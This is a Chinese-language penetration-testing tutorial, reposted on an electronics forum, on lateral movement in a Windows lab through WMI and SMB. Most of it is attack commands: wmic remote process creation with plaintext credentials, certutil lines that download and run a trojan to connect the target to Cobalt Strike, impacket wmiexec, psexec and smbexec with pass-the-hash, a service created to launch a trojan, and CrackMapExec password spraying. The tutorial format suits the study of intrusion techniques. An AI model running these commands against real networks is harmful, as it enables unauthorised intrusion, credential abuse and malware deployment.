0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

什么是WMI?WMI利用手法介紹

jf_vLt34KHi ? 來源:Tide安全團(tuán)隊(duì) ? 2023-02-12 09:40 ? 次閱讀

WMI

什么是WMI?

WMI是通過135端口進(jìn)行利用,支持用戶名明文或hash的方式進(jìn)行認(rèn)證,在使用WMIC執(zhí)行命令過程中,操作系統(tǒng)默認(rèn)不會(huì)將WMIC的操作記錄在日志中,因此在利用過程中不會(huì)產(chǎn)生日志。所以越來越多的攻擊者開始漸漸使用WMI進(jìn)行攻擊。

WMI的利用條件

1.獲得目標(biāo)機(jī)器的用戶名和密碼

2.開放139、445端口

WMIC的使用需要對(duì)方開啟135端口(有的工具需要445端口)和admin$共享,135端口是WMI默認(rèn)的管理端口

WMI利用手法

WMI演示環(huán)境如下圖:

f16595d2-a9e3-11ed-bfe3-dac502259ad0.png

WMIC

系統(tǒng)自帶的WMIC命令是單執(zhí)行,無回顯的,并且只支持明文密碼,不支持hash進(jìn)行傳遞 在這里,我們對(duì)SQLserver執(zhí)行了一個(gè)ipconfig的命令,并將結(jié)果保存在C盤的ip.txt文件中:

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cipconfig>c:ip.txt

f175f300-a9e3-11ed-bfe3-dac502259ad0.png

可以看到我們并無法直接看到命令的回顯,但我們上帝視角切到靶機(jī)發(fā)現(xiàn)確實(shí)是執(zhí)行命令了的 。

f19752ca-a9e3-11ed-bfe3-dac502259ad0.png

這里如果在實(shí)戰(zhàn)中,如果想要查看文件內(nèi)容和文件是否上傳成功的話,就要使用上篇文章內(nèi)網(wǎng)移動(dòng)-IPC中的type和dir命令

dir\192.168.3.32c$#列出該主機(jī)的C盤下的文件 type\192.168.3.32c$ip.txt

f1b501bc-a9e3-11ed-bfe3-dac502259ad0.pngf1d68b16-a9e3-11ed-bfe3-dac502259ad0.png

這里將其上線CS的步驟也是:使用下載命令讓其下載Web Server中的木馬,執(zhí)行上線

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/ccertutil-urlcache-split-f "#下載Webserver中的木馬文件到自己的C盤

f1fa3106-a9e3-11ed-bfe3-dac502259ad0.png

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cc:/4444.exe"#執(zhí)行木馬

f21184b4-a9e3-11ed-bfe3-dac502259ad0.png

可以看到此時(shí)sqlserver成功被上線。

f22bb9ba-a9e3-11ed-bfe3-dac502259ad0.png

wmiexec.vbs

wmiexec.vbs 腳本通過 VBS 調(diào)用 WMI 來模擬 PsExec 的功能,wmiexec.vbs 下載地址:https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs,交互式,適合在反彈shell或msfconsole中使用,不適合CS控制 首先我們將其上傳到跳板機(jī)中,然后再使用命令去連接,由于CS無法返回shell的問題,所以該腳本并不適用于在CS中運(yùn)行,所以這里我選擇將會(huì)話轉(zhuǎn)移到MSF中去運(yùn)行。

f237bb20-a9e3-11ed-bfe3-dac502259ad0.png

cscript//nologowmiexec.vbs/shell192.168.3.32administratoradmin!@#45

f24171f6-a9e3-11ed-bfe3-dac502259ad0.png

可以看到在MSF中運(yùn)行了該文件后,成功將sqlserver的shell反彈了過來,在此我們可以直接讓其下載后門并執(zhí)行,上線到我們的CS中。

cmd.exe/ccertutil-urlcache-split-f

f2556742-a9e3-11ed-bfe3-dac502259ad0.png

可以看到SQLserver成功上線CS

wmiexec-impacket

impacket套件中的wmiexec同樣可對(duì)WMI進(jìn)行橫向移動(dòng),并且支持交互式與單執(zhí)行,支持hash進(jìn)行傳遞,相對(duì)來說更為方便,這里直接使用它的py腳本配合socket代理就可以對(duì)其內(nèi)網(wǎng)進(jìn)行橫向移動(dòng),避免了上傳文件等敏感操作。首先設(shè)置好Socket代理,與proxifier的代理與代理規(guī)則

f268a65e-a9e3-11ed-bfe3-dac502259ad0.pngf278f23e-a9e3-11ed-bfe3-dac502259ad0.pngf29125b6-a9e3-11ed-bfe3-dac502259ad0.png

配置好socket代理與規(guī)則后,就可直接在本機(jī)中調(diào)用wmiexec.py文件對(duì)其內(nèi)網(wǎng)進(jìn)行wmi利用

pythonwmiexec.py./administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標(biāo)本地用戶交互式shell pythonwmiexec.pygod/administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標(biāo)域用戶交互式shell

f2a8c842-a9e3-11ed-bfe3-dac502259ad0.pngf2cf77f8-a9e3-11ed-bfe3-dac502259ad0.png

通過該命令成功獲得一個(gè)交互式的shell,那么wmiexec.py也可單執(zhí)行命令。

pythonwmiexec.py./administrator:admin!@#45@192.168.3.32"whoami"#以明文密碼連接本地用戶并執(zhí)行命令

f2f5c886-a9e3-11ed-bfe3-dac502259ad0.png

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"whoami"#以hash密碼連接本地用戶并執(zhí)行命令

f3075c72-a9e3-11ed-bfe3-dac502259ad0.png

這里將目標(biāo)上線CS的方式和上面一致,通過命令下載木馬并執(zhí)行。

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"cmd.exe/ccertutil-urlcache-split-f "

f315ca32-a9e3-11ed-bfe3-dac502259ad0.png

SMB

什么是SMB?

SMB(Server Message Block)服務(wù)器信息塊,它也是一種客戶端到服務(wù)器的通信協(xié)議。除此之外,SMB協(xié)議也被稱為請(qǐng)求-回復(fù)協(xié)議??蛻舳伺c服務(wù)器建立連接后,客戶端可以向服務(wù)器發(fā)送SMB命令允許用戶訪問共享、打開、讀取或者是寫入文件

SMB的利用條件

1. 利用SMB服務(wù)可以通過明文或hash傳遞來遠(yuǎn)程執(zhí)行,條件445服務(wù)端口開放。

2.獲得該目標(biāo)的賬號(hào)名與密碼或hash

SMB利用手法

SMB演示環(huán)境如下圖:

f33c48f6-a9e3-11ed-bfe3-dac502259ad0.png

PsExec

官方Psexec

Psexec 是由 Mark Russinovich 創(chuàng)建的 Sysinternals Suite中包含的工具。最初,它旨在作為系統(tǒng)管理員的便利工具,以便他們可以通過在遠(yuǎn)程主機(jī)上運(yùn)行命令來執(zhí)行維護(hù)任務(wù)。后來因?yàn)樘^方便,被利用到內(nèi)網(wǎng)滲透之中,但不支持hash傳遞,且CS無法利用,而且該工具好像只能在具有桌面權(quán)限后才可進(jìn)行利用,我這里使用msf和反彈shell都無法成功反彈shell.... 這里將psexec.64上傳到跳板機(jī)中

f34e367e-a9e3-11ed-bfe3-dac502259ad0.png

然后在跳板機(jī)桌面中運(yùn)行該工具,就會(huì)反彈出目標(biāo)機(jī)器的shell,如下圖所示

psexec64.exe\192.168.3.32-uadministrator-padmin!@#45-scmd

f3615e02-a9e3-11ed-bfe3-dac502259ad0.png

Impacket-PsExec

還有一個(gè)psexec就是我們的impacket套件中的工具,官方psexec有諸多限制,如不支持hash、cs、msf無法利用成功等問題,所以這里選擇使用impacket中的psexec工具就相對(duì)來說比較靈活,同樣,為了避免發(fā)送上傳文件時(shí)數(shù)據(jù)丟失或被查殺等問題,我們可使用socket+psexec.py對(duì)其內(nèi)網(wǎng)進(jìn)行橫向移動(dòng)。socket配置此處不再描述,這里直接使用impacket-Psexec.py進(jìn)行利用

psexec.py./administrator:admin!@#45@192.168.3.32#通過明文密碼連接獲得目標(biāo)本地用戶交互式shell psexec.pygod/administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標(biāo)域用戶交互式shell

f39025de-a9e3-11ed-bfe3-dac502259ad0.pngf3ab14e8-a9e3-11ed-bfe3-dac502259ad0.png

pythonpsexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32#通過哈希密碼連接獲得目標(biāo)本地用戶交互式shell pythonpsexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通過哈希密碼連接獲得目標(biāo)域用戶交互式shell

f3c0ae02-a9e3-11ed-bfe3-dac502259ad0.pngf3e05d10-a9e3-11ed-bfe3-dac502259ad0.png

CS插件-psexec

在我們的CS中其實(shí)也有PSEXEC利用功能,且利用較為方便與簡(jiǎn)單,在targets中選中目標(biāo)右鍵即可彈出利用選項(xiàng),且支持hash的移動(dòng)

f40a39c8-a9e3-11ed-bfe3-dac502259ad0.png

點(diǎn)擊psexec64后,就會(huì)讓我們選擇用戶名密碼與所登錄域等,這里我們直接選擇之前我們?cè)谔鍣C(jī)中所收集的密碼,Domain置空的話為本地用戶登錄,輸入域名后則為域用戶登錄,選擇監(jiān)聽器和會(huì)話之后,點(diǎn)擊Launch即可。

f41c0f7c-a9e3-11ed-bfe3-dac502259ad0.pngf42e0182-a9e3-11ed-bfe3-dac502259ad0.png

這里看到Sqlserver成功上線,這里如果想以域用戶的身份登錄時(shí),Domain處輸入域名即為域用戶身份登錄。

f447c252-a9e3-11ed-bfe3-dac502259ad0.png

較為簡(jiǎn)單,這里不做過多講解。

smbexec-impacket

在impacket中smbexec工具也可以進(jìn)行移動(dòng),該工具利用方式和psexec利用方式相同,這里簡(jiǎn)單介紹一下即可

pythonsmbexec.py./administrator:admin!@#45@192.168.3.32#通過明文密碼連接獲得目標(biāo)本地用戶交互式shell pythonsmbexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通過哈希密碼連接獲得目標(biāo)域用戶交互式shell

f46bf244-a9e3-11ed-bfe3-dac502259ad0.pngf496adf4-a9e3-11ed-bfe3-dac502259ad0.png

Services

同時(shí)還有一個(gè)系統(tǒng)自帶的服務(wù)也可進(jìn)行利用,該服務(wù)支持哈希密碼傳遞,且為單執(zhí)行無回顯,無法交互shell。具體利用過程如下:首先建立SMB連接后,創(chuàng)建一個(gè)服務(wù),服務(wù)綁定木馬,然后在啟動(dòng)該服務(wù),即可上線到CS中

services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32create-nameshell-displayshellexec-pathC:4444.exe#建立SMB連接并創(chuàng)建服務(wù)綁定木馬 services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32start-nameshell#啟動(dòng)shell服務(wù)

CrackMapExec

在內(nèi)網(wǎng)滲透中,能獲取到主機(jī)管理員賬號(hào)密碼,將會(huì)使我們橫向事半功倍,尤其是在大內(nèi)網(wǎng)環(huán)境中,密碼復(fù)用率很高,一波噴灑,能助力你拿到一波主機(jī),對(duì)拿到的主機(jī)再次抓取密碼,再用新拿到的密碼噴灑一波......,如此反復(fù)。密碼噴灑的思路就是這樣:不斷收集內(nèi)網(wǎng)賬號(hào)密碼,不斷去噴灑。這時(shí)我們就需要類似CrackMapExec這樣的密碼噴灑工具,對(duì)其內(nèi)網(wǎng)進(jìn)行密碼噴灑。CrackMap同樣的,CrackMapExec支持本地、域內(nèi)和明文密文的fuzz,具體利用命令如下:域用戶明文密碼噴灑:

proxychainscrackmapexecsmb192.168.3.21-32-udbadmin-p'Admin12345'

f4b08f80-a9e3-11ed-bfe3-dac502259ad0.png

本地用戶明文密碼噴灑:

proxychainscrackmapexecsmb192.168.3.21-32-uadministrator-p'admin!@#45'--local-auth

f4d61cfa-a9e3-11ed-bfe3-dac502259ad0.png

域內(nèi)用戶hash密碼噴灑

proxychainscrackmapexecsmb192.168.3.32-udbadmin-H'518b98ad4178a53695dc997aa02d455c'

f527e6de-a9e3-11ed-bfe3-dac502259ad0.png

本地用戶hash密碼噴灑

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth

f54cbb08-a9e3-11ed-bfe3-dac502259ad0.png

執(zhí)行命令也是非常的簡(jiǎn)單,這里直接在上面命令后加上-x 'bash' 即可

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth-x'whoami'

f5746072-a9e3-11ed-bfe3-dac502259ad0.png

當(dāng)然這里也可以通過已經(jīng)噴灑出的主機(jī)和密碼配合CS中的psexec上線到CS中。此處就不再演示。







審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    751

    瀏覽量

    43993
  • SMB
    SMB
    +關(guān)注

    關(guān)注

    0

    文章

    35

    瀏覽量

    11738
  • WMI
    WMI
    +關(guān)注

    關(guān)注

    0

    文章

    2

    瀏覽量

    6070
  • Hash算法
    +關(guān)注

    關(guān)注

    0

    文章

    43

    瀏覽量

    7379

原文標(biāo)題:橫向移動(dòng)-WMI、SMB

文章出處:【微信號(hào):Tide安全團(tuán)隊(duì),微信公眾號(hào):Tide安全團(tuán)隊(duì)】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    IE工具--IE七大手法

    IE工具--IE七大手法
    發(fā)表于 05-06 19:36

    在passthrough中使用GPU進(jìn)行測(cè)試

    我在xenserver 6.2 SP1上的傳遞模式中有K2,我正在嘗試確定我的應(yīng)用程序如何強(qiáng)調(diào)GPU。我添加了nvidia WMI包,但是對(duì)于我關(guān)心的所有GPU值,例如內(nèi)存和%GPU,windows
    發(fā)表于 10-10 16:17

    變頻電源的操作手法

    在你購買任何一樣電器產(chǎn)品的時(shí)候,銷售員都會(huì)告訴你使用方法是怎樣的,應(yīng)該注意些什么。因?yàn)槊總€(gè)產(chǎn)品都會(huì)用專用的操作手法,這樣就會(huì)在避免操作錯(cuò)誤或者不當(dāng)而造成損害。變頻電源也是一樣,也有正確的操作手法
    發(fā)表于 12-30 07:09

    怎么修改筆記本蓋上的電源設(shè)置

    一個(gè)網(wǎng)友問怎么修改筆記本蓋上的電源設(shè)置,比較直接的方式可以直接通過wmi修改。比如說$Name=@{Namespace='root\cimv2\power'}$ID
    發(fā)表于 03-02 06:34

    mcuxpresso Windows 10 21H1和Windows 11無法運(yùn)行程序wmic createprocess error=2怎么解決?

    頻道版本中已棄用。此工具已被適用于 WMI 的 Windows PowerShell 取代。注意:此棄用僅適用到命令行管理工具。WMI 本身不受影響?!迸R時(shí)解決方法:幸運(yùn)的是我還有一個(gè)
    發(fā)表于 04-04 08:40

    基于WMI的實(shí)時(shí)監(jiān)控系統(tǒng)設(shè)計(jì)與實(shí)現(xiàn)

    本文設(shè)計(jì)了一個(gè)基于WMI的系統(tǒng)性能實(shí)時(shí)監(jiān)控系統(tǒng),使用JFreeChart設(shè)計(jì)用戶界面,從而實(shí)現(xiàn)系統(tǒng)性能的實(shí)時(shí)監(jiān)控,并對(duì)系統(tǒng)實(shí)現(xiàn)過程中涉及到的關(guān)鍵技術(shù)進(jìn)行了研究分析。關(guān)鍵詞: WMI;
    發(fā)表于 06-20 08:42 ?27次下載

    BS架構(gòu)下基于WMI實(shí)現(xiàn)映射網(wǎng)絡(luò)驅(qū)動(dòng)器

    利用網(wǎng)絡(luò)映射驅(qū)動(dòng)器將學(xué)生平時(shí)上機(jī)練習(xí)的文件和計(jì)算機(jī)網(wǎng)絡(luò)化考試時(shí)學(xué)生的考試文件直接保存在服務(wù)器上,可以有效的管理學(xué)生的文件,防止文件丟失。針對(duì)傳統(tǒng)映射方法工作
    發(fā)表于 12-25 16:42 ?18次下載

    常用QC手法應(yīng)用實(shí)務(wù)

    常用QC手法應(yīng)用實(shí)務(wù) 本課程以實(shí)際應(yīng)用為導(dǎo)向,說明并整合QC7手法與新QC7手法(管理7手法)以講師資深實(shí)務(wù)經(jīng)驗(yàn),依企業(yè)實(shí)際狀況,組合改善活動(dòng)常用工具、方法,參加學(xué)員除
    發(fā)表于 02-01 14:02 ?59次下載

    windowsxp常用命令

    windowsxp常用命令   winver---------檢查windows版本 wmimgmt.msc----打開windows管理體系結(jié)構(gòu)(wmi) wupdmgr-------
    發(fā)表于 01-10 09:05 ?1260次閱讀

    WINDOWS開始運(yùn)行中可以起動(dòng)的程序命令展覽

    WINDOWS開始運(yùn)行中可以起動(dòng)的程序命令展覽 winver---------檢查Windows版本 wmimgmt.msc----打開windows管理體系結(jié)構(gòu)(WMI) wupdmgr--------windows更
    發(fā)表于 01-14 10:58 ?752次閱讀

    氬弧焊焊接手法與技巧

    本文主要闡述了氬弧焊焊接手法與技巧。
    發(fā)表于 08-26 13:57 ?2.9w次閱讀

    建筑照明系統(tǒng)設(shè)計(jì)的表現(xiàn)手法介紹

    古建筑是城市景觀的重要組成部分,反映了一座城市的文化底蘊(yùn)和歷史氣息。那么,中國古建筑照明設(shè)計(jì)有哪些燈光表現(xiàn)手法
    的頭像 發(fā)表于 12-24 12:24 ?498次閱讀

    常見服務(wù)弱口令爆破工具:crack

    支持常見服務(wù)口令爆破(未授權(quán)檢測(cè)):ftp、ssh、wmi、wmihash 、smb、mssql、oracle、mysql、rdp。
    的頭像 發(fā)表于 10-31 11:30 ?2272次閱讀

    什么是PTH?PTH利用手法介紹

    pass the hash:哈希傳遞攻擊,簡(jiǎn)稱PTH,是在內(nèi)網(wǎng)滲透中一種很經(jīng)典的攻擊方式
    的頭像 發(fā)表于 05-16 09:44 ?2977次閱讀
    什么是PTH?PTH<b class='flag-5'>利用手法</b><b class='flag-5'>介紹</b>

    新QC七大手法(工具)完整版介紹

    導(dǎo)語“七大手法”主要是指企業(yè)質(zhì)量管理中常用的質(zhì)量管理工具,昨天給大家介紹的老七種手法?!袄掀叻N”有分層法、調(diào)查表、排列法、因果圖、直方圖、控制圖和相關(guān)圖,新的QC七種工具分別是系統(tǒng)圖、關(guān)聯(lián)圖、親和圖
    的頭像 發(fā)表于 04-09 09:42 ?3336次閱讀
    新QC七大<b class='flag-5'>手法</b>(工具)完整版<b class='flag-5'>介紹</b>